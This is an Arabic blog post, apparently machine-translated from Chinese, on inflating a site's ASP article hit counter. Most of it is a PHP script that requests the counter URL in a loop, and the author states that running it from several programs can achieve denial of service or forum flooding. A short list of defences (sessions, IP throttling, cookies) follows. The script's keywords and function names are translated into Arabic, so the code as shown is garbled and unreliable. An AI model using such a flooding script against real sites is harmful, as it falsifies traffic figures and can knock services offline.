رأيت اليوم بالصدفة موقع ويب يمكن تحديث عداده في صفحة ثابتة، واعتقدت أنه يجب القيام بذلك باستخدام js. وعندما فتحت الكود المصدري، تبين أنه:
<div align=center><SPAN class=Article_tdbgall>.
المؤلف: مصدر المقال غير معروف: Meidi.Net
عدد النقرات:
<script language='javascript' src='/Article/GetHits.asp?ArticleID=759'></script>
وقت التحديث: 2005-5-27</SPAN>
</div>
عدد النقرات يتبعه ملف asp للمعالجة، لذا سأفتح هذا الملف وألقي نظرة:
document.write('210');
صحيح، إن ملف GetHists.asp هو الذي يعالج ArticleID و يستخرج النتائج ويخرج عدد المرات: المستند .write('عدد المرات')، والذي يمكن الرجوع إليه مباشرة في الصفحة الثابتة.
الأشرار هم أشرار في نهاية المطاف، لذا فكرت، كيف يمكنني زيادة عدد النقرات بسرعة؟ التحديث اليدوي ليس مفيدًا جدًا، حسنًا، قم بكتابة برنامج PHP بسرعة للوصول تلقائيًا إلى هذا الملف.
كود PHP هو كما يلي:
<?php
/* access_url.php */
تحديد (SUM، 1000)؛ // عدد الزيارات المطلوبة
تعريف (L_TIME، 1000)؛ // فرض وقت تنفيذ البرنامج النصي
تحديد(S_TIME, 1); // وقت النوم بين كل زيارة
$url = " http://www.xxx.com/Article/GetHits.asp?ArticleID=759 "; // العنوان الذي سيتم الوصول إليه
set_time_limit(L_TIME);
// الوصول إلى وظيفة URL المحددة knowsky.com
وظيفة access_url($url)
{
إذا تم إرجاع ($url=='') خطأ؛
$fp = fopen($url, 'r') أو خروج('فشل فتح عنوان url!');
إذا ($fp) {
بينما (!feof($fp)) {
$file = fgets($fp);
echo $file."n<p> </p>n";
}
غير محدد(ملف$);
}
}
//امتحان
لـ ($i=0; $i<SUM; $i++) {
Access_url($url);
النوم (S_TIME)؛
}
?>
قم بتشغيل البرنامج أعلاه، ثم سيتم الوصول إلى عنوان URL المحدد بشكل مستمر، وبطبيعة الحال سيستمر عدد مرات الوصول في الزيادة، مما يحقق تأثير الفيضان. إذا كانت حركة المرور كبيرة ويتم استخدام برامج متعددة لتشغيلها، فمن السهل تحقيق تأثير رفض الخدمة (DoS). إذا اتخذ الطرف الآخر إجراءات وقائية وقام بتعديل الكود وتقديمه إلى المنتدى، فمن السهل تحقيق تأثير إغراق المنتدى.
طرق الوقاية:
1. استخدم آلية الجلسة في الكود عندما يرسل المستخدم، يتم إنشاء معرف الجلسة عند إرسال المحتوى، ويتم الحكم على ما إذا كان قد تم إرساله أم لا.
2. بعد إرسال المستخدم، يتم تسجيل عنوان IP الخاص بالمستخدم. إذا أرسل المستخدم مرة أخرى خلال الوقت المحدد، فلا يُسمح بأي إرسال آخر.
3. بعد أن يرسل المستخدم المحتوى، تتم كتابة ملف تعريف الارتباط على عميل المستخدم. إذا أرسل المستخدم مرة أخرى، فتحقق مما إذا كان هناك ملف تعريف ارتباط على العميل لتحديد ما إذا كان الإرسال مسموحًا به.
هناك العديد من الطرق الأخرى، يمكنك البحث عنها، أو استخدام خيالك للقيام بعمل أفضل.